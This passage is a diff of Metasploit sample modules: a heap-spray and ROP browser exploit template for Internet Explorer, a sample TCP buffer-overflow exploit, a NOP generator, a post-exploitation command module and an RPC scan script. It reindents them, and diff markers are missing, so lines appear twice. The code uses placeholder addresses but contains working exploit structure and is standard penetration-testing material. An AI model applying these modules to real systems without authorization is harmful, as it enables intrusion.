[ 'IE 10 on Windows 8', { 'Rop' => :jre } ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00", # js_property_spray
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Apr 1 2013",
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Module Name",
|
||||
'Description' => %q{
|
||||
This template covers IE8/9/10, and uses the user-agent HTTP header to detect
|
||||
the browser version. Please note IE8 and newer may emulate an older IE version
|
||||
in compatibility mode, in that case the module won't be able to detect the
|
||||
browser correctly.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'sinn3r' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://metasploit.com' ]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
|
||||
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
|
||||
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ],
|
||||
[ 'IE 9 on Windows 7', { 'Rop' => :jre } ],
|
||||
[ 'IE 10 on Windows 8', { 'Rop' => :jre } ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00", # js_property_spray
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Apr 1 2013",
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
return target if target.name != 'Automatic'
|
||||
def get_target(agent)
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
|
||||
ie_name = "IE #{ie}"
|
||||
ie_name = "IE #{ie}"
|
||||
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '6.0'
|
||||
os_name = 'Windows Vista'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
when '6.2'
|
||||
os_name = 'Windows 8'
|
||||
end
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '6.0'
|
||||
os_name = 'Windows Vista'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
when '6.2'
|
||||
os_name = 'Windows 8'
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
return t
|
||||
end
|
||||
end
|
||||
targets.each do |t|
|
||||
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
return t
|
||||
end
|
||||
end
|
||||
|
||||
nil
|
||||
end
|
||||
nil
|
||||
end
|
||||
|
||||
def get_payload(t)
|
||||
stack_pivot = "\x41\x42\x43\x44"
|
||||
code = payload.encoded
|
||||
def get_payload(t)
|
||||
stack_pivot = "\x41\x42\x43\x44"
|
||||
code = payload.encoded
|
||||
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
print_status("Using msvcrt ROP")
|
||||
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
print_status("Using msvcrt ROP")
|
||||
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
|
||||
|
||||
else
|
||||
print_status("Using JRE ROP")
|
||||
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
|
||||
end
|
||||
else
|
||||
print_status("Using JRE ROP")
|
||||
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
|
||||
end
|
||||
|
||||
rop_payload
|
||||
end
|
||||
rop_payload
|
||||
end
|
||||
|
||||
|
||||
def get_html(t)
|
||||
js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
|
||||
html = %Q|
|
||||
<script>
|
||||
#{js_property_spray}
|
||||
def get_html(t)
|
||||
js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
|
||||
html = %Q|
|
||||
<script>
|
||||
#{js_property_spray}
|
||||
|
||||
var s = unescape("#{js_p}");
|
||||
sprayHeap({shellcode:s});
|
||||
</script>
|
||||
|
|
||||
var s = unescape("#{js_p}");
|
||||
sprayHeap({shellcode:s});
|
||||
</script>
|
||||
|
|
||||
|
||||
html.gsub(/^\t\t/, '')
|
||||
end
|
||||
html.gsub(/^\t\t/, '')
|
||||
end
|
||||
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
print_status("Requesting: #{request.uri}")
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
print_status("Requesting: #{request.uri}")
|
||||
|
||||
target = get_target(agent)
|
||||
if target.nil?
|
||||
print_error("Browser not supported, sending 404: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
target = get_target(agent)
|
||||
if target.nil?
|
||||
print_error("Browser not supported, sending 404: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Target selected as: #{target.name}")
|
||||
html = get_html(target)
|
||||
send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
|
||||
end
|
||||
print_status("Target selected as: #{target.name}")
|
||||
html = get_html(target)
|
||||
send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
|
||||
end
|
||||
end
|
||||
|
|
|
@ -15,71 +15,71 @@ require 'msf/core'
|
|||
###
|
||||
class Metasploit4 < Msf::Exploit::Remote
|
||||
|
||||
#
|
||||
# This exploit affects TCP servers, so we use the TCP client mixin.
|
||||
#
|
||||
include Exploit::Remote::Tcp
|
||||
#
|
||||
# This exploit affects TCP servers, so we use the TCP client mixin.
|
||||
#
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Sample Exploit',
|
||||
'Description' => %q{
|
||||
This exploit module illustrates how a vulnerability could be exploited
|
||||
in an TCP server that has a parsing bug.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => ['skape'],
|
||||
'References' =>
|
||||
[
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
# Target 0: Windows All
|
||||
[
|
||||
'Windows XP/Vista/7/8',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Ret' => 0x41424344
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => "Apr 1 2013",
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Sample Exploit',
|
||||
'Description' => %q{
|
||||
This exploit module illustrates how a vulnerability could be exploited
|
||||
in an TCP server that has a parsing bug.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => ['skape'],
|
||||
'References' =>
|
||||
[
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
# Target 0: Windows All
|
||||
[
|
||||
'Windows XP/Vista/7/8',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Ret' => 0x41424344
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => "Apr 1 2013",
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
#
|
||||
# The sample exploit just indicates that the remote host is always
|
||||
# vulnerable.
|
||||
#
|
||||
def check
|
||||
Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
#
|
||||
# The sample exploit just indicates that the remote host is always
|
||||
# vulnerable.
|
||||
#
|
||||
def check
|
||||
Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
#
|
||||
# The exploit method connects to the remote service and sends 1024 random bytes
|
||||
# followed by the fake return address and then the payload.
|
||||
#
|
||||
def exploit
|
||||
connect
|
||||
#
|
||||
# The exploit method connects to the remote service and sends 1024 random bytes
|
||||
# followed by the fake return address and then the payload.
|
||||
#
|
||||
def exploit
|
||||
connect
|
||||
|
||||
print_status("Sending #{payload.encoded.length} byte payload...")
|
||||
print_status("Sending #{payload.encoded.length} byte payload...")
|
||||
|
||||
# Build the buffer for transmission
|
||||
buf = rand_text_alpha(1024)
|
||||
buf << [ target.ret ].pack('V')
|
||||
buf << payload.encoded
|
||||
# Build the buffer for transmission
|
||||
buf = rand_text_alpha(1024)
|
||||
buf << [ target.ret ].pack('V')
|
||||
buf << payload.encoded
|
||||
|
||||
# Send it off
|
||||
sock.put(buf)
|
||||
sock.get_once
|
||||
# Send it off
|
||||
sock.put(buf)
|
||||
sock.get_once
|
||||
|
||||
handler
|
||||
end
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -15,20 +15,20 @@ require 'msf/core'
|
|||
###
|
||||
class Metasploit4 < Msf::Nop
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Sample NOP Generator',
|
||||
'Description' => 'Sample single-byte NOP generator',
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'skape',
|
||||
'Arch' => ARCH_X86)
|
||||
end
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Sample NOP Generator',
|
||||
'Description' => 'Sample single-byte NOP generator',
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'skape',
|
||||
'Arch' => ARCH_X86)
|
||||
end
|
||||
|
||||
#
|
||||
# Returns a string of 0x90's for the supplied length.
|
||||
#
|
||||
def generate_sled(length, opts)
|
||||
"\x90" * length
|
||||
end
|
||||
#
|
||||
# Returns a string of 0x90's for the supplied length.
|
||||
#
|
||||
def generate_sled(length, opts)
|
||||
"\x90" * length
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -14,21 +14,21 @@ require 'msf/core'
|
|||
###
|
||||
module Metasploit4
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Payload::Single
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Debugger Trap',
|
||||
'Description' => 'Causes a debugger trap exception through int3',
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'skape',
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Payload' =>
|
||||
{
|
||||
'Payload' => "\xcc"
|
||||
}
|
||||
))
|
||||
end
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Debugger Trap',
|
||||
'Description' => 'Causes a debugger trap exception through int3',
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'skape',
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Payload' =>
|
||||
{
|
||||
'Payload' => "\xcc"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -15,26 +15,26 @@ require 'msf/core/post/common'
|
|||
###
|
||||
class Metasploit4 < Msf::Post
|
||||
|
||||
include Msf::Post::Common
|
||||
include Msf::Post::Common
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Sample Post Module',
|
||||
'Description' => %q{Sample Post Module},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'sinn3r'],
|
||||
'Platform' => [ 'win'],
|
||||
'SessionTypes' => [ "shell", "meterpreter" ]
|
||||
))
|
||||
end
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Sample Post Module',
|
||||
'Description' => %q{Sample Post Module},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'sinn3r'],
|
||||
'Platform' => [ 'win'],
|
||||
'SessionTypes' => [ "shell", "meterpreter" ]
|
||||
))
|
||||
end
|
||||
|
||||
#
|
||||
# This post module runs a ipconfig command and returns the output
|
||||
#
|
||||
def run
|
||||
print_status("Executing ipconfig on remote machine")
|
||||
o = cmd_exec("ipconfig")
|
||||
print_line(o)
|
||||
end
|
||||
#
|
||||
# This post module runs a ipconfig command and returns the output
|
||||
#
|
||||
def run
|
||||
print_status("Executing ipconfig on remote machine")
|
||||
o = cmd_exec("ipconfig")
|
||||
print_line(o)
|
||||
end
|
||||
|
||||
end
|
|
@ -5,19 +5,19 @@ require 'msfrpc-client'
|
|||
require 'rex/ui'
|
||||
|
||||
def usage(ropts)
|
||||
$stderr.puts ropts
|
||||
$stderr.puts ropts
|
||||
|
||||
if @rpc and @rpc.token
|
||||
wspaces = @rpc.call("pro.workspaces") rescue {}
|
||||
if wspaces.keys.length > 0
|
||||
$stderr.puts "Active Projects:"
|
||||
wspaces.each_pair do |k,v|
|
||||
$stderr.puts "\t#{k}"
|
||||
end
|
||||
end
|
||||
end
|
||||
$stderr.puts ""
|
||||
exit(1)
|
||||
if @rpc and @rpc.token
|
||||
wspaces = @rpc.call("pro.workspaces") rescue {}
|
||||
if wspaces.keys.length > 0
|
||||
$stderr.puts "Active Projects:"
|
||||
wspaces.each_pair do |k,v|
|
||||
$stderr.puts "\t#{k}"
|
||||
end
|
||||
end
|
||||
end
|
||||
$stderr.puts ""
|
||||
exit(1)
|
||||
end
|
||||
|
||||
opts = {}
|
||||
|
@ -27,88 +27,88 @@ parser = Msf::RPC::Client.option_parser(opts)
|
|||
parser.separator('Discover Mandatory Options:')
|
||||
|
||||
parser.on("--project PROJECT") do |x|
|
||||
opts[:project] = x
|
||||
opts[:project] = x
|
||||
end
|
||||
|
||||
parser.on("--targets TARGETS") do |x|
|
||||
opts[:targets] = [x]
|
||||
opts[:targets] = [x]
|
||||
end
|
||||
|
||||
parser.on("--blacklist BLACKLIST (optional)") do |x|
|
||||
opts[:blacklist] = x
|
||||
opts[:blacklist] = x
|
||||
end
|
||||
|
||||
parser.on("--speed SPEED (optional)") do |x|
|
||||
opts[:speed] = x
|
||||
opts[:speed] = x
|
||||
end
|
||||
|
||||
parser.on("--extra-ports PORTS (optional)") do |x|
|
||||
opts[:extra_ports] = x
|
||||
opts[:extra_ports] = x
|
||||
end
|
||||
|
||||
parser.on("--blacklist-ports PORTS (optional)") do |x|
|
||||
opts[:blacklist_ports] = x
|
||||
opts[:blacklist_ports] = x
|
||||
end
|
||||
|
||||
parser.on("--custom-ports PORTS (optional)") do |x|
|
||||
opts[:custom_ports] = x
|
||||
opts[:custom_ports] = x
|
||||
end
|
||||
|
||||
parser.on("--portscan-timeout TIMEOUT (optional)") do |x|
|
||||
opts[:portscan_timeout] = x
|
||||
opts[:portscan_timeout] = x
|
||||
end
|
||||
|
||||
parser.on("--source-port PORT (optional)") do |x|
|
||||
opts[:source_port] = x
|
||||
opts[:source_port] = x
|
||||
end
|
||||
|
||||
parser.on("--custom-nmap-options OPTIONS (optional)") do |x|
|
||||
opts[:custom_nmap_options] = x
|
||||
opts[:custom_nmap_options] = x
|
||||
end
|
||||
|
||||
parser.on("--disable-udp-probes (optional)") do
|
||||
opts[:disable_udp_probes] = true
|
||||
opts[:disable_udp_probes] = true
|
||||
end
|
||||
|
||||
parser.on("--disable-finger-users (optional)") do
|
||||
opts[:disable_finger_users] = true
|
||||
opts[:disable_finger_users] = true
|
||||
end
|
||||
|
||||
parser.on("--disable-snmp-scan (optional)") do
|
||||
opts[:disable_snmp_scan] = true
|
||||
opts[:disable_snmp_scan] = true
|
||||
end
|
||||
|
||||
parser.on("--disable-service-identification (optional)") do
|
||||
opts[:disable_service_identification] = true
|
||||
opts[:disable_service_identification] = true
|
||||
end
|
||||
|
||||
parser.on("--smb-user USER (optional)") do |x|
|
||||
opts[:smb_user] = x
|
||||
opts[:smb_user] = x
|
||||
end
|
||||
|
||||
parser.on("--smb-pass PASS (optional)") do |x|
|
||||
opts[:smb_pass] = x
|
||||
opts[:smb_pass] = x
|
||||
end
|
||||
|
||||
parser.on("--smb-domain DOMAIN (optional)") do |x|
|
||||
opts[:smb_domain] = x
|
||||
opts[:smb_domain] = x
|
||||
end
|
||||
|
||||
parser.on("--dry-run (optional)") do
|
||||
opts[:dry_run] = true
|
||||
opts[:dry_run] = true
|
||||
end
|
||||
|
||||
parser.on("--single-scan (optional)") do
|
||||
opts[:single_scan] = true
|
||||
opts[:single_scan] = true
|
||||
end
|
||||
|
||||
parser.on("--fast-detect (optional)") do
|
||||
opts[:fast_detect] = true
|
||||
opts[:fast_detect] = true
|
||||
end
|
||||
|
||||
parser.on("--help") do
|
||||
$stderr.puts parser
|
||||
exit(1)
|
||||
$stderr.puts parser
|
||||
exit(1)
|
||||
end
|
||||
|
||||
parser.separator('')
|
||||
|
@ -117,9 +117,9 @@ parser.parse!(ARGV)
|
|||
@rpc = Msf::RPC::Client.new(opts)
|
||||
|
||||
if not @rpc.token
|
||||
$stderr.puts "Error: Invalid RPC server options specified"
|
||||
$stderr.puts parser
|
||||
exit(1)
|
||||
$stderr.puts "Error: Invalid RPC server options specified"
|
||||
$stderr.puts parser
|
||||
exit(1)
|
||||
end
|
||||
|
||||
# Provide default values for certain options - If there's no alternative set
|
||||
|
@ -149,59 +149,59 @@ user = @rpc.call("pro.default_admin_user")['username']
|
|||
|
||||
# Create the task object with all options
|
||||
task = @rpc.call("pro.start_discover", {
|
||||
'workspace' => project,
|
||||
'username' => user,
|
||||
'ips' => targets,
|
||||
'DS_BLACKLIST_HOSTS' => blacklist,
|
||||
'DS_PORTSCAN_SPEED' => speed,
|
||||
'DS_PORTS_EXTRA' => extra_ports,
|
||||
'DS_PORTS_BLACKLIST' => blacklist_ports,
|
||||
'DS_PORTS_CUSTOM' => custom_ports,
|
||||
'DS_PORTSCAN_TIMEOUT' => portscan_timeout,
|
||||
'DS_PORTSCAN_SOURCE_PORT' => source_port,
|
||||
'DS_CustomNmap' => custom_nmap_options,
|
||||
'DS_UDP_PROBES' => disable_udp_probes,
|
||||
'DS_FINGER_USERS' => disable_finger_users,
|
||||
'DS_SNMP_SCAN' => disable_snmp_scan,
|
||||
'DS_IDENTIFY_SERVICES' => disable_service_identification,
|
||||
'DS_SMBUser' => smb_user,
|
||||
'DS_SMBPass' => smb_pass,
|
||||
'DS_SMBDomain' => smb_domain,
|
||||
'DS_SINGLE_SCAN' => single_scan,
|
||||
'DS_FAST_DETECT' => fast_detect
|
||||
'workspace' => project,
|
||||
'username' => user,
|
||||
'ips' => targets,
|
||||
'DS_BLACKLIST_HOSTS' => blacklist,
|
||||
'DS_PORTSCAN_SPEED' => speed,
|
||||
'DS_PORTS_EXTRA' => extra_ports,
|
||||
'DS_PORTS_BLACKLIST' => blacklist_ports,
|
||||
'DS_PORTS_CUSTOM' => custom_ports,
|
||||
'DS_PORTSCAN_TIMEOUT' => portscan_timeout,
|
||||
'DS_PORTSCAN_SOURCE_PORT' => source_port,
|
||||
'DS_CustomNmap' => custom_nmap_options,
|
||||
'DS_UDP_PROBES' => disable_udp_probes,
|
||||
'DS_FINGER_USERS' => disable_finger_users,
|
||||
'DS_SNMP_SCAN' => disable_snmp_scan,
|
||||
'DS_IDENTIFY_SERVICES' => disable_service_identification,
|
||||
'DS_SMBUser' => smb_user,
|
||||
'DS_SMBPass' => smb_pass,
|
||||
'DS_SMBDomain' => smb_domain,
|
||||
'DS_SINGLE_SCAN' => single_scan,
|
||||
'DS_FAST_DETECT' => fast_detect
|
||||
})
|
||||
|
||||
puts "DEBUG: Running task with #{task.inspect}"
|
||||
|
||||
if not task['task_id']
|
||||
$stderr.puts "[-] Error starting the task: #{task.inspect}"
|
||||
exit(0)
|
||||
$stderr.puts "[-] Error starting the task: #{task.inspect}"
|
||||
exit(0)
|
||||
end
|
||||
|
||||
puts "[*] Creating Task ID #{task['task_id']}..."
|
||||
while true
|
||||
select(nil, nil, nil, 0.50)
|
||||
select(nil, nil, nil, 0.50)
|
||||
|
||||
stat = @rpc.call("pro.task_status", task['task_id'])
|
||||
stat = @rpc.call("pro.task_status", task['task_id'])
|
||||
|
||||
if stat['status'] == 'invalid'
|
||||
$stderr.puts "[-] Error checking task status"
|
||||
exit(0)
|
||||
end
|
||||
if stat['status'] == 'invalid'
|
||||
$stderr.puts "[-] Error checking task status"
|
||||
exit(0)
|
||||
end
|
||||
|
||||
info = stat[ task['task_id'] ]
|
||||
info = stat[ task['task_id'] ]
|
||||
|
||||
if not info
|
||||
$stderr.puts "[-] Error finding the task"
|
||||
exit(0)
|
||||
end
|
||||
if not info
|
||||
$stderr.puts "[-] Error finding the task"
|
||||
exit(0)
|
||||
end
|
||||
|
||||
if info['status'] == "error"
|
||||
$stderr.puts "[-] Error generating report: #{info['error']}"
|
||||
exit(0)
|
||||
end
|
||||
if info['status'] == "error"
|
||||
$stderr.puts "[-] Error generating report: #{info['error']}"
|
||||
exit(0)
|
||||
end
|
||||
|
||||
break if info['progress'] == 100
|
||||
break if info['progress'] == 100
|
||||
end
|
||||
|
||||
$stdout.puts "[+] Task Complete!"
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue